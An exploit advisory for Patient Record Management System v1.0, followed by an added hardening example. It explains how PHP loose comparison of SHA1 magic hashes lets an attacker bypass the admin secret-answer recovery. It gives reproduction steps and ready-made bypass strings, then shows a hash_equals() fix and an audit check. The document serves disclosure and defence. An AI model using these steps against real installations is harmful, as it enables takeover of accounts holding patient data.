`# Exploit Title: Patient Record Management System v1.0 - Authentication Bypass via PHP Loose Comparison
# Exploit Author: Joe Pollock
# Date: January 19, 2023
# Vendor Homepage: https://www.sourcecodester.com/php/13505/patient-record-management-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/patientrecords.zip
# Tested on: Kali Linux, Apache, Mysql, PHP 8.1.5
# CVE: T.B.C
# Vendor: kimcey500
# Version: 1.0
# Exploit Description:
# Patient Record Management System v1.0 implements a PHP loose comparison within the password recovery functionality (secret question/answer) of
# the admin account, which renders the application vulnerable to an authentication bypass depending on the secret answer chosen by the administrator.
# If the secret answer generates a SHA1 magic hash (SHA1 is the hashing format used by the application to store secret answers) then an authentication
# bypass of the admin account is possible using any other SHA1 magic hash. The vulnerable function is found within User_model.php and is shown below:
public function get_forgot_secret($login_id, $secans){
    $this->db->where('u_id', $login_id);
    $query = $this->db->get('users');
    $decrypt = $query->row()->u_secretanswer;
    if(sha1($secans) == $decrypt){ // md5 encryption
        return $query->row();
    }
}
========================================================
(+) To reproduce this exploit:
========================================================
1. Log in as the administrator and navigate to the password recovery functionality (http://localhost/Indexcontrol/secretquestion).
2. Enter the "Current Password" then select any "Secret Question".
3. For the "Secret Answer", use the following: 10932435112
4. Confirm the "Secret Answer" then click "Submit". Now logout of the administrator account.
5. From the admin login page, click "Forgot Password?".
6. Enter "admin" as the username then click "Submit".
7. For the "Secret Answer", use any of the following:
aaroZmOk
w9KASOk6Ikap
aaO8zKZF
aa3OFF9m
w9KASOk6Ikap
8. After clicking 'Submit', the 'create new password' functionality should be displayed, and therefore authentication can be bypassed.
========================================================
(+) Explanation:
========================================================
Following from above, assume the administrator has chosen the following as their secret answer:
10932435112
The application then stores the SHA1 hash of the secret answer in the database. The stored hash is:
0e07766915004133176347055865026311692244
The above hash is an example of a 'magic hash', i.e. the hash starts with "0e" (or "0..0e") and is followed only by digits.
In PHP, if two strings that both match the regular expression 0+e[0-9]+ are loosely compared (==), each is treated as a number
in scientific notation (zero times a power of ten, i.e. 0), so the result will be TRUE.
It will then be possible to bypass the authentication of this account using any secret answer which generates a SHA1 magic hash.
Any of the following secret answers could be used to bypass authentication:
aaroZmOk
w9KASOk6Ikap
aaO8zKZF
aa3OFF9m
w9KASOk6Ikap
See here for more examples that could be used: https://github.com/spaze/hashes/blob/master/sha1.md
The comparison that the application would perform in get_forgot_secret() is:
if(sha1('aaroZmOk') == "0e07766915004133176347055865026311692244"){
//Reset password
}
Which becomes:
if("0e66507019969427134894567494305185566735" == "0e07766915004133176347055865026311692244"){
//Reset password
}
Due to the loose comparison used (==), the above evaluates to TRUE, which would then allow the attacker to change
the password of the account.
You can try this yourself using the interactive PHP interpreter:
var_dump(sha1('aaroZmOk') == "0e111");
var_dump(sha1('aaroZmOk') == "0e222");
var_dump(sha1('aaroZmOk') == sha1('w9KASOk6Ikap'));
========================================================
(+) References and more information
========================================================
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/README.md
http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html
https://www.whitehatsec.com/blog/magic-hashes/
https://github.com/spaze/hashes
https://offsec.almond.consulting/super-magic-hash.html
`
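The comparison from get_forgot_secret() next to a type-safe replacement, as an added example that is not part of the original advisory or the application's code. The function names check_loose, check_strict and is_magic_hash are hypothetical; the sample answers are the ones quoted in the advisory, plus one constructed non-matching value.

```php
<?php
// Added example: hypothetical helper names, not the application's own code.

// The comparison as written in get_forgot_secret(): loose (==).
// Two numeric strings such as "0e123" and "0e456" are compared as numbers.
function check_loose(string $storedHash, string $answer): bool
{
    return sha1($answer) == $storedHash;
}

// Hardened form: hash_equals() compares the two strings byte for byte
// (and in constant time), so no numeric-string conversion takes place.
function check_strict(string $storedHash, string $answer): bool
{
    return hash_equals($storedHash, sha1($answer));
}

// Audit helper: flags a stored hash that is only safe under strict comparison.
// Uses the advisory's pattern 0+e[0-9]+, anchored to the whole string.
function is_magic_hash(string $storedHash): bool
{
    return preg_match('/^0+e[0-9]+$/', $storedHash) === 1;
}

// Secret answer from the advisory; its SHA1 hash is what the database stores.
$stored = sha1('10932435112');

// First three values come from the advisory; the last one is constructed.
$candidates = ['10932435112', 'aaroZmOk', 'w9KASOk6Ikap', 'not-the-answer'];

printf("stored hash: %s (magic: %s)\n",
    $stored, var_export(is_magic_hash($stored), true));

foreach ($candidates as $answer) {
    printf("%-16s loose=%-5s strict=%s\n",
        $answer,
        var_export(check_loose($stored, $answer), true),
        var_export(check_strict($stored, $answer), true));
}
```

Running is_magic_hash over the existing u_secretanswer values identifies accounts whose recovery answer is exposed until the comparison is changed.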